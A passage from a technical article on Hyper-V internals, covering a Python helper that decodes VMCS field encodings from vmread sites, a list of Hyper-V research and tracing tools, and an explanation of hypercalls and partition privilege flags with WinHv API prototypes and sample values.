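    """Reserved bits (12 and 31:15) must be clear; 'high' access needs a 64-bit field."""
    if enc < 0 or enc > 0xFFFFFFFF:
        return False
    if enc & 0x1000 or enc >> 15:
        return False
    return not (enc & 1) or ((enc >> 13) & 3) == 1


def decode_vmcs_encoding(enc: int) -> dict:
    """Split one encoding into index / type / width / high-half flag and a name if known."""
    if not is_valid_encoding(enc):
        raise ValueError(f"invalid VMCS field encoding 0x{enc:08X}")
    base = enc & ~1                      # encoding of the full (low) field
    name = KNOWN_FIELDS.get(base, "UNKNOWN")
    if enc & 1:
        name += "_HIGH"
    return {
        "index": (enc >> 1) & 0x1FF,
        "type": FIELD_TYPES[(enc >> 10) & 3],
        "width": WIDTHS[(enc >> 13) & 3],
        "high": bool(enc & 1),
        "name": name,
    }


# Constructed sample: (function, encoding) pairs as a script would collect them
# from vmread instructions in the disassembly.  Function names are made up.
SAMPLE_VMREADS = [
    ("sub_FFFFF80000410000", 0x681E),   # reads GUEST_RIP
    ("sub_FFFFF80000420000", 0x4402),   # reads VM_EXIT_REASON
    ("sub_FFFFF80000420000", 0x6800),
    ("sub_FFFFF80000430000", 0x6C16),
    ("sub_FFFFF80000440000", 0x201A),
    ("sub_FFFFF80000440000", 0x201B),   # high half of EPT_POINTER
]


def label_vmreads(reads=SAMPLE_VMREADS) -> list:
    """Attach a symbolic field name to every vmread site."""
    return [(fn, enc, decode_vmcs_encoding(enc)["name"]) for fn, enc in reads]


def exit_handler_candidates(reads=SAMPLE_VMREADS) -> list:
    """Functions that read VM_EXIT_REASON: the VM exit dispatcher must be among them."""
    seen = []
    for fn, enc in reads:
        if enc == VM_EXIT_REASON and fn not in seen:
            seen.append(fn)
    return seen


if __name__ == "__main__":
    for fn, enc, name in label_vmreads():
        width = decode_vmcs_encoding(enc)["width"]
        print(f"{fn}: vmread 0x{enc:04X} {name:24s} {width}")
    print("exit handler candidates:", exit_handler_candidates())
```

<p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The reserved-bit check matters when the encodings are harvested automatically: an operand that fails it is not a VMCS field at all, usually a misidentified instruction, and labelling it would only pollute the database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">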
But you can learn the basic Hyper-V mechanisms and hypercall implementation by comparing them against Hyper-V TLFS 1.0.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A very good header file, hvgdk.h, containing up-to-date information about Hyper-V, was made by Alex Ionescu (@aionescu):</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://ionescu007.github.io/hdk" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://ionescu007.github.io/hdk</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It was up to date at the time of article publication.</span></p><p class="MsoNormal" style="text-align: justify; text-indent: 35.4pt;"><span lang="EN-US" style="font-size: 9pt; line-height: 107%; mso-ansi-language: EN-US;">Also,
you can find information in the Windows SDK WHVP API header files:</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvEmulation.h</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvPlatform.h</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvPlatformDefs.h</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; text-indent: 47.2px;"><span style="font-size: 9pt; text-indent: 35.4pt;">but currently they describe only the WinHvPlatform.dll and WinHvEmulation.dll libraries.</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span style="font-size: 9pt; text-indent: 35.45pt;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; 
vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Tools</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Many tools have been developed over these years. I am not describing the Sysinternals Suite, because it is the standard for Windows research without kernel or user-mode debugging.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">An interesting set of tools from Pavel Yosifovich (@zodiacon): it looks like the Sysinternals Suite tools, but comes with source code. 
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ETWProvider – you can see all ETW providers loaded by Hyper-V components at runtime.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 591px; overflow: hidden; width: 393px;"><img height="591" src="https://lh5.googleusercontent.com/s8I9a1WYDhbF2MYnFW7TmWmCThktl7EyN2EMqP8Z3hhZvGa9vnY66Np8b-TxPPIwQLbC7YAWkAonMR5D7W0EkAMIzq_S9jgRYJ_9i_GTPtLNB1wT2wXdG-D2YoR_V_AnCKXDVyslWfweVFZO_A" style="margin-left: 0px; margin-top: 0px;" width="393" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DrvMon – you can see the communication between kernel-mode and user-mode Hyper-V components.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 252px; overflow: hidden; width: 458px;"><img height="252" 
src="https://lh6.googleusercontent.com/JAkJqGi_4eiC1x3wBHoF083FN70DveTE7G3wPPQx922jYzjvds4n1HSlixxHdCpyuthWrYOk2hVwLkNIjuWwWupm3_Ay3p5g0_d7G4qydjGSwxkFqKnXWXxUYRgDjO7XVysGAZupeML4zFx_8w" style="margin-left: 0px; margin-top: 0px;" width="458" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A good collection of diagnostic tools from Microsoft:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;"><a href="https://github.com/CSS-Windows/WindowsDiag" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/CSS-Windows/WindowsDiag</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For Hyper-V, the ETW collection tools can be used:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;">VMLtrace</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Fruti</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 296px; overflow: hidden; width: 406px;"><img alt="Изображение" height="296" src="https://lh4.googleusercontent.com/47B_fABpH4uaW8aYzhxg4i83DHrdrm2EKKAHpYGT5ZSdvghFFnxbT0dMcv72KfE7AV_Fmmm7VBiJCXCESOdjJjwayVzSwFrmfNW0v7qkXCZWeLpbsGfU29cI5cHgXhkRNmh-rUC9gwvMqccPDg" style="margin-left: 0px; margin-top: 0px;" width="406" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">tss_VMLverbosity.ps1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; 
font-weight: 400; text-decoration: none; vertical-align: baseline;">V_Tracing_Using_Channels.ps1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 479px; overflow: hidden; width: 387px;"><img alt="Изображение" height="479" src="https://lh5.googleusercontent.com/PGZWh76V_3502S3aM5b2_iEiz3qvG6kXycNpFQWHu_EtdCckMV28u5jqKrShzEdal-VF6RxQWEGgT0VVIZg20rMry8cuq4Pja9kMY8D14aKwFh5brqA2h_meiL6Yh9yVZPB9mz5dZN6gdFnN0Q" style="margin-left: 0px; margin-top: 0px;" width="387" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; 
text-decoration: none; vertical-align: baseline;">Hypercalls</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The latest Hypervisor Top-Level Functional Specification for Windows Server 2019, version 6.0b, describes the Hyper-V interfaces and internals of some Hyper-V components.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each virtual machine, as well as the root OS, is represented as a partition. Each partition has its own 64-bit identifier, which must be unique on the host server.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each partition is given privileges at creation (the HV_PARTITION_PRIVILEGE_MASK structure), which determine whether it is allowed to perform specific hypercalls.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can read the privileges by executing the following code in ring 0 in the root partition:</span></p><p dir="ltr" 
style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId(&PartID);// partition id</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(PartID,</span><span face="Calibri,sans-serif" style="background-color: white; color: darkslategrey; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags</span><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">,&HvProp);</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">// the result is returned in HvProp.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags is one of the values of the HV_PARTITION_PROPERTY_CODE enumeration, which is used by the functions exported by the winhvr.sys\winhv.sys drivers.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: 
normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out PHV_PARTITION_PROPERTY</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, if necessary, these privileges can be changed by calling the following function from the root partition:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="background-color: #e6e6e6; 
line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty(</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for the Windows Server 2019 root partition: 002BB9FF00003FFF</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 166px; overflow: hidden; width: 602px;"><img height="166" src="https://lh6.googleusercontent.com/k6JUfo4keMii_bntFPkDP-XN1pH9WIUUY4JivnSJIpUioUN-g17IFyLlq-wX052VVdWQgr0J-BidHtAxMpI1P4hbyFvdJCBCpD2CTOQ2KBzKfQiQLRhor0dn5u2cBYpePXxBN0hThx4OtrJCIQ" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for a child partition is 003B80B000002E7F:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 188px; overflow: hidden; width: 518px;"><img height="188" src="https://lh4.googleusercontent.com/UPqbIvM3CGZ-qv1j71SMLGwFPi3jjEnn2FaCYxDUV1EnSPCC3aeP9DiMAaEluhZnUruL3NMKf_aLH0qX6vKJ36mnjrskFwzniZQDDKnm3h7q1_33h6gKc_--ib4d3GPi2ogv9xGzZGJDIoFhwg" style="margin-left: 0px; margin-top: 0px;" width="518" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, the privileges can be obtained by loading 0x40000003 into EAX and executing the CPUID instruction (Hyper-V TLFS 6.0b gives the interpretation of the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cpuid</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: 
